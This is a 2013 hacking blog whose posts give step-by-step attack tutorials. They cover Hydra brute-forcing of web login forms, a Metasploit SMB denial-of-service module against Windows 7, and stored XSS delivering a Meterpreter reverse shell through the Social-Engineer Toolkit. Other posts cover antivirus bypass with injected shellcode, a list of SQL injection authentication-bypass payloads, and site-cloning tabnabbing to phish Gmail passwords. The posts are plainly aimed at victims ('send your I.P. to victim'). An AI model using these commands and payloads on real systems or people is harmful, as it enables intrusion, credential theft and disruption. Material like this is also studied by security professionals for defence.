Wednesday, January 30, 2013

Brute-Force attack using HYDRA

3 comments

What is BRUTE-FORCE attack ?


A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

How to install THC-hydra ?


Open your terminal & type following command

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading ,we are going to extract it

tar -xvf hydra-6.3-src.tar.gz

(4)tar -xvf hydra-6.3-src.tar.gz

(5)./configure && make && install

(6)make install


How to use THC-hydra?


If you are attacking FTP service then first make sure to run an nmap scan for any open FTP ports (by default it should be 21)

Now in order to brute-force a specific login form you need to define the user-name (if you don't know it include a file containing some), the word-lists directory, the service attacking and form method and the page itself.

Type following command in terminal

hydra -l admin -P /root/pass  127.0.0.1 http-post-form "/mutillidae/index.php?page=login.php:username=^USER^&password=^PASS^&login-php-submit-button=Login:Not Logged In"

hydra-bruteforce

The -l switch defines the username and the capital -L - a list of usernames for the brute-force attack (if you don't know the login).

The -p switch defines the password and the capital -P - the directory for the wordlists ( the -P is used almost always)

If we're attacking a web form over http and the method is post then we use "http-post-form" if the service is FTP simply use "ftp".

Another thing you should be aware of is that the variables username and password are not always the same. They different depending on the code.

They could be usr,pwd etc - it's not necessarily for them to be as in most cases "username" & "password". Just view the source and make sure what their names are.

Now there are a lot more options of Hydra. I'll explain some of them below no matter that they are included in the MAN page of hydra

-vV - The verbose mode. This mode shows you every login attempt hydra tries.

-s - We specify the port on which we're running our attack.

-x - For brute-force parameters generation. We define our charset and minimum & maximum length of it.

-R - Restores a previously aborted session of an attack.

-e ns - Checks for blank or no password fields.

Wednesday, January 23, 2013

Web application and audit framework

0 comments
w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability assessments and penetration tests.

Download:-

The framework can be downloaded from the project main page:http://www.w3af.com/#download

Installation:-

Some of the requirements are bundled with the distribution file, in order to make

the installation process easier for the novice user. The bundled requirements can

be found inside the extlib directory. Most of the libraries can be run from that

directory, but some others require an installation process, the installation steps

for these libraries are (as root):

cd w3af

cd extlib

cd fpconst­0.7.2

python setup.py install

cd ..

cd SOAPpy

python setup.py install

cd ..

cd pyPdf

python setup.py install

Running w3af:-

w3af has two user interfaces, the console user interface (consoleUI) and the

graphical user interface (gtkUi). To use console interface type

./w3af_console

w3af>>>

If you are using w3af first time then I recommended you to use graphical user interface.

./w3af_gui

The graphical user interface allows you to perform all the actions that the

framework offers and features a much easier and faster way to start a scan and

analyze the results.

If you want to know more about plugins & console interface, here is document. You can Download it.

Sunday, January 20, 2013

DOS attack on windows-7 using metasploit

0 comments
This module exploits a denial of service flaw in the Microsoft Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module as a service and forces a vulnerable client to access the IP of this system as an SMB  server. This can be accomplished by embedding a UNC path (\HOST\share\something) into a web page if the target is using Internet Explorer, or a Word 
document otherwise.

(1)msfconsole

(2)use dos/windows/smb/ms10_006_negotiate_response_loop

(3)show options

(4)set SRVHOST I.P. of local machine 

dos-attack-on-window

(5)exploit

[*] Starting the malicious SMB service...

[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything

[*] Server started.

If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.

Wednesday, January 16, 2013

How to exploit stored xss using S.E.T?

0 comments

Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.

(1)First I recommended you to view “How to fiind xss in website?” here.

(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set
(3)Now select option 1 which is Social-Engineering Attacks.
(4)Select option 2 which is website attack vector.
(5)Select option 3which is Java Applet Attack Method.
(6)Select option 1 web -templetes.
(7)Select option 1 java Required.
(8)Now we will select payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port:443 . Now metasploit will open.
(10)Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS.

Tuesday, January 15, 2013

How to view USB History of Windows PC?

0 comments
USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

                 Download USBDeview For X32 System
                 Download USBDeview For X64 System  
You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.

Connecting To Remote Computer
The following command-line options allows you to connect to remote computers. You must login to the remote computer with admin user in order to use these options.
  • /remote <\\Computer Name>
    Allows you to connect a single remote computer.
    For Example:
    USBDeview.exe /remote \\MyComp
  • /remotefile <Computers List File>
    Allows you to connect multiple computers, and view all their USB activity in one window. The computers list file should be a simple Ascii text file with computer names separated by colon, semicolon, space, tab characters or CRLF.
    For Example:
    USBDeview.exe /remotefile "c:\temp\comp.txt"


Thursday, January 10, 2013

Bypass Antivirus using S.E.T

0 comments
Bypass Antivirus using multyply injector shell code using SET & Metasploit.

Requirement:-


Victim`s O.S.- windows.

Attacker:- S.E.T ,Metasploit.

(1)Open terminal & type following command

sudo bash

cd /opt/set

./set

(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”

(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)

(7)Now choose 16 “Multi PyInjector Shellcode Injection”,

(8)Port of the attacker computer. In this example I use port 443

(9)Select the payload you want to deliver via shellcodeexec press enter here

(10)Now again select Port of the attacker computer. In this example I use port 444 and 445

(11)Select the payload you want to deliver via shellcodeexec press enter here

(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc

(13)sessions -l

(14)sessions -i I.d

Tuesday, January 8, 2013

List Of Vulnerability & it`s Tutorial.

0 comments

It`s 100th post. When I started to write , I did not think that it may longer this.So today I don`t put any new article about hacking , I am gonna repeat some famous vulnerability which we had seen before.
In the chart , you can see that different types of vulnerability & it`s percentage which exists in website.

This is web-browser vulnerability . So you can see that which browser is easy to hack.

(A)S.Q.L. Injection:-

It is a hacking method that allows an unauthorized attacker to access a database server. It is facilitated by a common coding blunder: the program accepts data from a client and executes SQL queries without first validating the client’s input. The attacker is then free to extract,modify, add, or delete content from the database.

Tutorial on S.Q.L. Injection:-

Monday, January 7, 2013

Sql Injection Authentication bypass cheat sheet

0 comments
This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order to automate the process.If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Saturday, January 5, 2013

How to move S.E.T. to Github?

0 comments
The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially been moved to github. Github provides a much faster platform to getting releases up and a more efficient method for obtaining new releases to SET.

All you need to do to go from the current version to git is do an svn update in the set directory and run the automatic installer. SET updates once pulled through github will now be pulled from the github repositories versus svn. The subversion repos will remain active for a couple months.

How to Move S.E.T. to Github ?


1. Manual

2. Automatic

How to Manual install S.E.T.?

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk
git clone https://github.com/trustedsec/social-engineer-toolkit.git
cd social-engineer-toolkit
./setoolkit

Whenever you need updates, just run the update tool or type git pull. In addition to the new release to git, the installer has been updated to support OSX installations. This update puts SET at version 4.3.4.

How to install Automatic S.E.T.?


In this method we assume that you have already install SET , & which use svn , but new version moved to github.

cd /pentest/exploits/set
svn update
./set

[-] New set_config.py file generated on: 2013-01-04 10:54:25.898164
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2013-01-04 10:54:25.898164
[*] SET is using the new config, no need to restart[!] The Social-Engineer Toolkit has officially moved to github and no longer uses SVN.
[!] Ensure that you have GIT installed and this conversion tool will automatically pull the latest git version for you.
[!] Do you want to do a manual install or have SET do the conversion to GIT for you?

1. Automatic
2. Manual
3. Continue using SET (NO UPDATES ANYMORE!)


Enter your numeric choice: 1
[*] BEFORE YOU START! Ensure you have GIT installed (apt-get install git)
Have you installed GIT? y/n: y
[*] Great! Here we go... Removing old svn repository and moving to new
[*] SET directory has been removed. Now checking out SET from GIT..
[*] This could take a few moments..
Cloning into /opt/set...
remote: Counting objects: 403, done.
remote: Compressing objects: 100% (323/323), done.
remote: Total 403 (delta 81), reused 392 (delta 70)
Receiving objects: 100% (403/403), 35.81 MiB | 1.45 MiB/s, done.
Resolving deltas: 100% (81/81), done.
[*] You should now have the latest from git. To update, run set-update or type git pull
[*] Exit SET and restart. Move out of the current directory and go into the set directory.
[*] You should never have to go through this process again!

====How to Update====

(You may choose either ./set-update or git pull as advise above.)

root@LM:/opt/set# ./set-update
[-] Updating the Social-Engineer Toolkit, be patient...
Already up-to-date.

[*] The updating has finished, returning to main menu..
root@LM:/opt/set# git pull
Already up-to-date.

==== STEP 2====

#If you came across this error message :

root@LM:/opt/set# ./set
[!] Metasploit path not found. These payloads will be disabled.
[!] Please configure in the config/set_config.Just Press

#Then it will pop-up Terms of service

Do you agree to the terms of service [y/n]: y

#It will go to the SET Menu and choose "99" to exit SET

set>99

#Edit config/set_config ( Use nano or vim are up to you )

root@LM:/opt/set# nano config/set_config

#In config/set_config Editor.Please edit base on your Metasploit directory:-

### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit-4.4.0/msf3/#Save and Exit the Editor.Kindly update your Metasploit by choosing no 4 in SET Menu.

4) Update the Metasploit Framework

set> 4

#Once update you may run SET as normal

Wednesday, January 2, 2013

Tabnabbing Tutorial

0 comments
Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine.The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake page in one of the open tabs in your browser

We cover two methods of tabnabbing.

(1)Manual.

(2)With the help of S.E.T.

Tab-nabbing with help of S.E.T?

(1)Open S.E.T.(you can find how to install & configure set here?)

(2)Select option 1 which is Social-Engineering Attacks.

(3)Select option 2 which is Website Attack Vectors.

(4)Now option-4 which is tabnabbing attack method

(5)Select site cloner.

(6)Enter URL OF site. (For example if you want to hack gmail account of victim ,then type gmail.com.)

(7)Send link of your I.P. To victim via mail or chat.(You can also spoofemail. See here.)

(8)As soon as he open tab , he found message that “please wait while site is loading.”

(9)when victim change tab, it redirect him to your phishing page.

In next tutorial we will see manual method of tab-nabbing. Because if you have dynamic I.p than this method is not so useful, because as soon as your I.p. Change , listener of S.E.T. Is stopped. So you cannot get password of victim.
UA-35960349-1